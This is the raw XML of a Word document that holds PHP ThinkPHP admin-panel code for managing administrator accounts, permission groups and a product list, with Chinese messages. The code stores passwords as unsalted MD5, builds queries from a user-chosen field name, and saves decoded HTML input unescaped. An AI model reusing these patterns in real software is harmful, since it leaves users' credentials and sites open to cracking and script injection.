          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AD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$data=Db::name('admin')-&gt;alias('a')-&gt;join('admin_type b','a.type=b.id')-&gt;field('a.id,a.name,b.title,a.create_time,a.create_ip,a.update_time,a.update_ip,a.hide')-&gt;paginate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE537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782DE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2A6E7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157F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0BC367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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276CC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$admin_type=Db::name('admin_type')-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CEA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$this-&gt;assign('admintype',$admin_type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF03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8CAF2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CD2C0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$validate=validate('Admin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C4A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$array=['type'=&gt;$post['type'],'hide'=&gt;$post['hide']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007AC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if(!$post['name']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31640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请输入账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A97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04B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if($validate-&gt;check($post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE809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if($post['password']!=$post['password2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE91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密码和确认密码不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02212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36B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47086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299C9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7FB26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if(!$post['password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EDE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$password=Db::name('admin')-&gt;where('id',$id)-&gt;value('password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E386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8A82E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$password=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370351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6305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2D494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$password=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A3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802A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$dbdata=['name'=&gt;$post['name'],'password'=&gt;$password,'update_time'=&gt;$time,'update_ip'=&gt;$ip];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8B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$dbdata = array_merge($array, $dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6A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68C1B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$namebd=Db::name('admin')-&gt;where('name',$post['name'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50AF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if($namebd){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D8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账户已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C2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D178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if(!$post['password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15E5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密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A14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B43F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$dbdatas=['create_time'=&gt;$time,'create_ip'=&gt;$ip];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F27D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$dbdata = array_merge($dbdatas, $dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB8B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$db=Db::name('admin')-&gt;insert($dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABA0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53369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50744D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8C145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49A5B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4A8B1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06A805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if($id==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F980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$dbdata=['name'=&gt;$post['name'],'password'=&gt;$password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC03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3F9B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$db=Db::name('admin')-&gt;where('id',$id)-&gt;update($dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A77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C2F2A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68796C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53904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475EF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BF4B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B096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B9C1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$data=["err"=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2B1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6233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A5B25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5BB72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$name=Db::name('admin')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33238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44963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3E832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170F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7C13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83FE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C5D7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DDC98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DF37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86614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21B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6AFF9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AE1B9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70A10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if($id==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9571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账户禁止删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F285D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A85C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if(input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A745C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$db=Db::name('admin')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DA4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52A4F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0330FD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97F26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'.$db];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC0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3C00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DED0E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5A60F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0494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D28D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0924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577631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45E8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10358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5D73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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D96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$data=Db::name('admin_type')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9C7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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0063BD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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76D1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5E40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typeAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA9F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C60FF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$t=Db::name('category')-&gt;where('tid',0)-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A43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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064365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 as $k=&gt;$v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3F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$html.='&lt;h5&gt;'.$v['title'].'&lt;/h5&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E96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$t2=Db::name('category')-&gt;where('tid',$v['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA1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if($t2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6F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($t2 as $v2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3F4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$html.='&lt;div class="form-group"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49560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$html.='&lt;label class="col-sm-2 control-label"&gt;'.$v2['title'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042450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$html.='&lt;div class="col-sm-10"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CC6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$html.='&lt;div class="radio i-checks"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A949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if($v2['controller'] &amp;&amp; $v2['function']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177552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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE028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4864C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$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3631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if($checkeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F14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foreach(json_decode($checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669304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if($cv==$v2['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31157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$checked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2C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FEA8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AC26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43E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44027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['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42E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3803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5D859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$html.='&lt;label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v2['id'].'" name="data[]"&gt;'.$v2['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA6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$t3=Db::name('category')-&gt;where('tid',$v2['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1E1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if($t3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964D3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foreach($t3 as $v3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2113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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BECD7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8213F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$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EF1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if($checkeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD415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foreach(json_decode($checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53DE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if($cv==$v3['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F900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$checked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A11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96932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B710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F4D6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BD50C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['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756A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BBA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2EC0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$html.='&lt;label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v3['id'].'" name="data[]"&gt;'.$v3['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA36A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$t4=Db::name('category')-&gt;where('tid',$v3['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712717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if($t4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B335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foreach($t4 as $v4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027069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D974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$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAD4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if($checkeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DE0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foreach(json_decode($checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA2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if($cv==$v4['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DAF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$checked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C650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B17C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B255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9305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84999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['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A91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F387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B3D3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$html.='&lt;label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v4['id'].'" name="data[]"&gt;'.$v4['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD9F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9A7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0FDC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98FF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7F42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C3312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$t3=Db::name('category')-&gt;where('tid',$v2['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59E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if($t3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A99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foreach($t3 as $v3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A074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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9913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4A936A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lastRenderedPageBreak/>
        <w:t>$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D38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if($checkeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D144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foreach(json_decode($checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F35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if($cv==$v3['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C4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$checked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB70C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86264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B310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89D7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C2B81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['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1965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594D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07B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$html.='&lt;label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v3['id'].'" name="data[]"&gt;'.$v3['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9B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$t4=Db::name('category')-&gt;where('tid',$v3['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BA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if($t4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C10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foreach($t4 as $v4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4D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84CCC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$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F57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if($checkeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA3D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foreach(json_decode($checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB75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if($cv==$v4['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB37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$checked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB25C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E813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F27C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AFBF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35E19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['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AF1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CCD5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305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$html.='&lt;label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v4['id'].'" name="data[]"&gt;'.$v4['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE14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2E4B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1E2F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1592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AE54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F1BC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$html.='&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCE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F27B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8AA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EB58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$this-&gt;assign('category',$html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEC8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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C5E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09DC9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$title=$post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30440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if(!input('?post.data')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2682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$dataname=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E2D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2CC1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$dataname=$post['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACEC5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6C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCBB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if($dataname){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B85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$array=['title'=&gt;$title,'data'=&gt;json_encode($dataname)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022B5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1EA54F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$titledb=Db::name('admin_type')-&gt;where('title',$title)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E47C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468784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名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE11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326C3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$db=Db::name('admin_type')-&gt;insert($array);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61333E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60223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1B0692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40FC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6619FA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995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DF849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49254C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if($id==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDB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$array=['title'=&gt;$title];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D897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$db=Db::name('admin_type')-&gt;where('id',$id)-&gt;update($array); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FA9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2957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$db=Db::name('admin_type')-&gt;where('id',$id)-&gt;update($array);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C8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1DD1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7FD6C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30451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0F87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7CD56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7EF5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A1AA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407A3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最少选一个权限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341384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BCEE8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BAE2A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类型名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390A3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E3BA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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E4E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58BE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$name=Db::name('admin_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02629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1BD81F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4D3D6A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2EDB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8A1E3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B04D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91D0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$data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1005DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA850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3225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863F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typeDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07346C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012CF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$id=input('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35342E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if($id==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9D4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超级管理员禁止删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C92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5090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if(input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0CE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$admin=Db::name('admin')-&gt;where('type',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A10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if(!$admin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199535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$db=Db::name('admin_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29E4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E375C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6CF0F4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2E1A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56877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092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62474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请先删除管理员列表对应类型账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F925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1AA9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2F132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A3123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246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20B0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E29B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00CEA7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0EB4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63CE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8E12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7645A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7FECCD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3A8AF4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7FC19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07757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Shop extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6071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7E25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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002F26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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA09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$name=input('name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78FF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58FA5C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17AFEC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if($type=='id'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531525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$where[$type]=$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D5F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221A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$where[$type]=['like','%'.$name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7B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3A8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3EA3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$typeid=input('typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24204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if($typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F16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$where['typeid']=$typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4410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3F9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$data=Db::name('shoplist')-&gt;where($where)-&gt;order('des desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D192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2A121A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139790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$this-&gt;assign('page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389657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$this-&gt;fetch('list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5FF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0829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5B3DB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$mychannel['id']=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C6F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$this-&gt;assign('mychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6600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$typeiddb=Db::name('shoplist_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B96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$this-&gt;assign('typeid',$typeiddb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526D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6EDEC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2806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4151B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78BE84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if(!$post['typeid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3AE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请选择分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C31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60E5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$post['time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4FD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if(empty($post['text'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF85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请填写详细内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751660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77DD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$post['text']=html_entity_decode($post['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8ABD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$post['money']=$post['money']*100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6B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if($post['images']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8710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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80FB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foreach(json_decode($post['images'],true) as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452FD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$images[]=$v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BF0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0682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$post['images']=json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA10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AC34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455EF8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$titledb=Db::name('shoplist')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F69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38220F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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6B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BE4F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$db=Db::name('shoplist')-&gt;insertGetId($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDE7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1D02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48BC46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9E5D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022C11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FAE9A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186AD2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$db=Db::name('shoplist')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551AAF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BC204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5D4356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B5E4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6B689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EE9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4DD2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99317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AF6B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$name=Db::name('shoplist')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0AF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$name['weitoutiao']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A749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$this-&gt;assign('name', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8C9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057A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844A8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0A69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3800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D71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64F211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59C4C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482D99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185D96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$db=Db::name('shoplist')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59543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F2D51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58A777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BAA7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4657CE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198F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4A30C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E2348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9A1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5BCD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979FD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0076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4D268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FD1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670877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$data=Db::name('shoplist_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3D1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20F1E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A6016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3A42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typeidadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D13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79A78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A05CF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BFF11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435D89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$typename=Db::name('typeid')-&gt;where(['title'=&gt;$post['title']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766381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if($typename){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627187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栏目标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38563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129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$db=Db::name('shoplist_typeid')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1BB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0EBB6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3DC7DD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78479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703BC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FDA0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2B115F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$db=Db::name('shoplist_typeid')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AA7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6500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286EEE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B6D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7C67BF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19AE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B47DD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F1BC7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7C4CA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$name=Db::name('shoplist_typeid')-&gt;where(['id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A486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29CA50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517375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57D88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BDB78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A801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404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49285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1CD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D56DB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217F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typeiddel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826C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3060F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A972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376FC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$db=Db::name('shoplist_typeid')-&gt;delete($id);</w:t>
